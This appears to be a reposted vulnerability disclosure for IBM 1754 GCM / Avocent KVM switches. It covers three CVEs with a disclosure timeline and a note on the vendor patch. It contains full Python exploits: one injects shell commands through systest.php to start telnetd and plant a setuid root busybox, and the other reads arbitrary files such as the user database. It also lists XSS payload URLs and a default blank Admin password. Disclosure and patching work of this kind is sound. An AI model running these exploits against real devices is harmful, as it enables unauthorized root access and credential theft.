Bài liên quan
*Product description* The IBM 1754 GCM family provides KVM over IP and serial console managementtechnology in a single appliance. Versions v1.20.0.22575 and prior are Note that this vulnerability is also present in some DELL and probablyother vendors of this rebranded KVM. I contacted Dell but no response hasbeen received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticatedattacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability:#!/usr/bin/python"""Exploit for Avocent KVM switch v1.20.0.22575.Remote code execution with privilege elevation.SessionId (avctSessionId) is neccesary for this to work, so you need avalid user. Default user is "Admin" with blank password.After running exploit, connect using telnet to device with user target(pass: target) then do "/tmp/su -" to gain root (password "root")alex.a.bravo@gmail.com"""from StringIO import StringIOimport pycurlimport ossessid = "1111111111"target = "192.168.0.10"durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"storage = StringIO()c = pycurl.Curl()c.setopt(c.URL, durl)c.setopt(c.SSL_VERIFYPEER,0)c.setopt(c.SSL_VERIFYHOST,0)c.setopt(c.WRITEFUNCTION,storage.write)c.setopt(c.COOKIE,'avctSessionId=' + sessid)try: print "[*] Sending GET to " + target + " with session id " + sessid+ "..." c.perform() c.close()except: print ""finally: print "[*] Done"print "[*] Trying telnet..."print "[*] Login as target/target, then do /tmp/su - and enter password\"root\""os.system("telnet " + target)*2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitraryfiles. Files can be anywhere on the target. PoC of this vulnerability:#!/usr/bin/python"""This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker toread arbitrary files on device.SessionId (avctSessionId) is neccesary for this to work, so you need avalid user.alex.a.bravo@gmail.com"""from StringIO import StringIOimport pycurlsessid = "1111111111"target = "192.168.0.10"file = "/etc/IBM_user.dat"durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + filestorage = StringIO()c = pycurl.Curl()c.setopt(c.URL, durl)c.setopt(c.SSL_VERIFYPEER,0)c.setopt(c.SSL_VERIFYHOST,0)c.setopt(c.WRITEFUNCTION,storage.write)c.setopt(c.COOKIE,'avctSessionId=' + sessid)try: c.perform() c.close()except: print ""content = storage.getvalue()print content.replace("<td>","").replace("</td>","")*3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused byimproper validation of user-supplied input. A remote attacker could exploitthis vulnerability using a specially-crafted URL to execute script in avictim's Web browser within the security context of the hosting Web site,once the URL is clicked. An attacker could use this vulnerability to stealthe victim's cookie-based authentication credentials. Examples:http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3Ehttps://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E*Vendor Response:*IBM release 1.20.20.23447 firmware*Timeline:*2014-05-20 - Vendor (PSIRT) notified2014-05-21 - Vendor assigns internal ID2014-07-16 - Patch Disclosed2014-07-17 - Vulnerability disclosed*External Information:*Info about the vulnerability (spanish):http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.htmlIBM Security Bulletin:http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983
Post a Comment